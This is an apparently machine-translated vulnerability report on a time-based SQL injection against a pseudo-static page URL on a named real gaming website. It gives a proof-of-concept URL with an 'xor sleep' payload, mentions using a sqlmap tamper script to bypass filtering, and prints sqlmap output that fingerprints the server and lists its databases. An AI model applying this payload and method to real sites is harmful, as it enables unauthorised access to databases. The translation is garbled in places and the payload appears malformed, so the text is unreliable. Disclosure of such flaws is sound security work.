Pseudo static SQL injection (bypassing filtering) on a bus stop)
Pseudo static SQL injection (bypassing filtering) on a bus stop)
URL: http://speed.tgbus.com/tgdb/car/202.shtmlPOC http://speed.tgbus.com/tgdb/car/202 xor sleep(52.16.shtml because of filtering, sqlmap needs to configure between. py
[20:19:12] [WARNING] changes made by tampering scripts are not supported ded in shown payload content (s)
[20:19:12] [INFO] the back-end DBMS is MySQL
Web server operating system: Windows
Web application technology: ASP. NET
Back-end DBMS: MySQL 5
[20:19:12] [INFO] fetching database names
[20:19:12] [INFO] fetching number of databases
[20:19:12] [INFO] heuristics detected web page charset 'utf-8'
[20:19:12] [INFO] resumed: 2
[20:19:12] [INFO] resuming partial value: inf
[20:19:12] [WARNING] time-based comparison requires larger statistical model, please wait .............................
Do you want sqlmap to try to optimize value (s) for DBMS delay responses (option '-- time-sec ')? [Y/n] y
[20:19:24] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[20:19:35] [INFO] adjusting time delay to 1 second due to good response times
Ormation_schema
[20:20:53] [INFO] retrieved: mmo2_gamedb
Available databases [2]:
[*] Information_schema
[*] Mmo2_gamedb